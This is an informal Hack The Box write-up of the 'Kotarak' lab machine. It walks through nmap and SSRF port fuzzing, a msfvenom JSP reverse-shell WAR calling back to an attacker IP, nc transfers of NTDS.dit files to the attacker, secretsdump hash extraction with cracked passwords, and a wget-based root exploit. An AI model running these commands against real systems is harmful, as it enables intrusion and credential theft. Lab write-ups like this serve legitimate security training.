HTB Write-up Kotarak

nmap: 

PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
1112/tcp  filtered msql
6002/tcp  filtered X11:2
8009/tcp  open     ajp13    Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open     http     Apache Tomcat 8.5.5
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5 - Error report
10009/tcp filtered swdtp-sv
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

8009 enum:

PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-request: 
| AJP/1.3 404 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 992
| 
|_<!DOCTYPE html><html><head><title>Apache Tomcat/8.5.5 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 404 - /</h1><div class="line"></div><p><b>type</b> Status report</p><p><b>message</b> <u>/</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><hr class="line"><h3>Apache Tomcat/8.5.5</h3></body></html>
| ajp-headers: 
|   Content-Type: text/html;charset=utf-8
|   Content-Language: en
|_  Content-Length: 992
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html

8080 enum:

Apache Tomcat/8.5.5

dirsearch result: 

/examples/
index,jsp
manager

index.jsp took me to the tomcat page:

Attempted logging in to host-manager butI ot this

s3cret?

tomcat -s3cret didn't work..lol

After running the full scan, I found port 60000 open

possibly LFI vuln?

it looks like you can enter any url to browse so I entered my own and served http server.

it worked.

if we see ueragent here we could exploit it but not this time.

Let's enter some values like file://etc/passwd

ok..

Now we can fuzz the local ports with wfuzz

wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ

got a bunch of 2Ls so let's modify our command

wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
wfuzz -z range,1-65535 --hl=2 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ

  • --hl=2 will omit the result with 2L

We can see some stuff coming back.

onport 888,found a file server

After URL encoding the last part of the request with burp, I was able to see the content

username: admin

password: 3@g01PdhB!

Now we are finally in the admin portal.

Make a war shell code with msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.14 LPORT=7777 -f war > shell.war

Got a initial shell back after deploy the war file and started a nc listner.

spawn the shell. python -c 'import pty;pty.spawn("/bin/bash")'

backups looks interesting

find . --> useful to find hidden files.

Started a listner on kali : nc -nvlp 443 > SYSTEM

nc 10.10.16.14 443 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

did the same for other file.

Now we've got the two files on our machine.

What is the NTDS.dit File?

The NTDS.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators.

Extracting Hashes and Domain Info From .dit

If you have the NTDS.dit file and the SYSTEM hive, you can simply use the secretsdump.py from impacket to extract all the NT hashes, but before we begin we need to download the files locally so we can extract the database information. I’m going to create a simple python HTTP server to transfer the files from the remote victim machine to my local machine.

it took forever to download these files! I tried the nc methods but I couldn't see the progress so files kept corrupting 

python secretsdump.py -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL

Output 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Time to crack some hashes!

Since the box is not windows, we have to crack them. And we don't care about the ones with $

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::

atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

separate them before the fourth colon.

Used this site to crack them.

admin cracked:

f16tomcat!

atanas - Password123!

Let's try ssh into these.

couldn't get in...

tried using su - atanas with the other password and it worked.

it looks like ssh is not enabled for this account.

Priv Esc

in root folder, we ca actually read app.log and flag.txt

wget 1.16...

let's do searchsploit to see what we have.

exploit DB: https://www.exploit-db.com/exploits/40064

  1. Pasted the wget.rc content in /dev/shm folder

you cannot run python server on 21 but the box has a program called authbind installed and it bypasses it

uploading wget exploit file to the victim (modified some parts)

used wget -r http://IP/exploit.py to transfer the file.

changed the http listening port to 0.0.0.0

in summary: we need to have python server & the ftp on the victims machine

and nc running on attacker's.

/root/hacked-via-wget

PreviousBart (Windows) - juicy potato priv esc, more hydra practiceNextHack the box write-up: Bounty

Last updated